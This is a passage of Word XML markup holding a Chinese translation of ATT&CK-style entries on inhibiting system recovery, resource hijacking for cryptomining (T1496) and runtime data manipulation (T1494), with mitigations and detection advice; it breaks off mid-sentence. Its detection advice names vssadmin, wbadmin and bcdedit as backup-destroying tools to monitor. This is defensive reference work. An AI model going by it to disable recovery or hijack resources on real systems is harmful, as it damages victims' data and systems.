    <w:p w14:paraId="7CBBFC0B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用进程监视来监视禁止系统恢复所涉及的二进制文件的执行和命令行参数，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>vssadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wbadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bcdedit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件日志，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ID 524</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指示系统目录已被删除，可能包含与可疑活动相关联的条目。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C11C3E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>监视系统恢复中涉及的服务的状态。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视注册表以查找与系统恢复功能相关的更改（例如：创建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1A43C9" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>劫持</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="4F009961" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69A767C2" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1496</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5644737D" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：恶劣影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B0F5F79" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37CE6F5D" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>所需权限：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0593046D" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>进程使用，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>协议分析，网络设备日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="741D8191" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B008BD1" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="650910E0" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D95E22" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用增选系统的资源来解决可能影响系统和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或托管服务可用性的资源相关问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FD0263" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>资源劫持攻击的一个常见目的是验证加密货币网络的交易并获得虚拟货币。攻击者可能会消耗足够的系统资源，从而对攻击的计算机造成负面影响和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或使它们不能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>响应</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。资源劫持攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的常见目标是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器和基于云的系统，因为它们具有很高的可用资源潜力。但攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>会入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户端点系统来实施资源劫持攻击和挖掘加密货币。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D51671A" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ED5A2A" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种攻击技术无法通过预防性控制轻松缓解，因为它基于滥用系统功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA8D1B4" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4981B511" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考虑监控进程资源使用情况来确定与恶意劫持计算机资源（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，内存和图形处理资源）相关的异常活动。监控加密货币挖掘软件相关的网络资源的可疑使用。监控本地系统上常见的加密采矿软件进程名称和文件，这些名称和文件可能表明存在入侵和资源使用情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6916F8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行时数据操控</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="77430DC5" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03A2F0A1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> T1494</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CF5FD5F" w14:textId="45A74657" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶劣</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2405F7C9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13FF9E6F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:lastRenderedPageBreak/>
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="506DB595" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BDBE3E2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CB1952" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>影响类型：完整性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DC204E8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00CB1952">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00CB1952">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6274486F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="004E23E3" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="220BAC8F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00904AC7" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以修改系统，以便在访问和显示给最终用户时操纵数据。通过操纵运行时数据，攻击者可能会尝试影响业务流程，组织理解和决策制定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E7A272" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会更改用于显示数据的应用程序二进制文件，以便进行运行时操作。</w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者还可以进行更改默认文件关联和伪装以产生类似的效果。</w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改的类型及其将产生的影响取决于目标应用程序和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进</w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程以及对手的目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和目标。</w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于复杂的系统，攻击者可能需要特殊的专业知识，并且可能需要访问与系统相关的专用软件，这些软件通常通过长时间的信息收集活动获得，以便产生预期的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354FC79B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2263"/>
        <w:gridCol w:w="7473"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="59FB0D68" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="50A95721" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0B807451" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="7B1EFC31" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3E41A6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00904AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络分段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6269423D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00904AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确定可能成为攻击目标的关键业务和系统流程，并努力隔离和保护这些系统，防止未经授权的访问和篡改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="103F5EC6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2263" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6EBDE26D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00904AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制文件和目录权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7473" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05A46EE8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00904AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防止关键业务和系统进程被替换</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>、被</w:t>
            </w:r>
            <w:r w:rsidRPr="00904AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>覆盖或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>被</w:t>
            </w:r>
            <w:r w:rsidRPr="00904AC7">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>重新配置以加载潜在的恶意代码。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A239703" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72653A0F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查重要的应用程序二进制文件哈希</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位置和可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00904AC7">
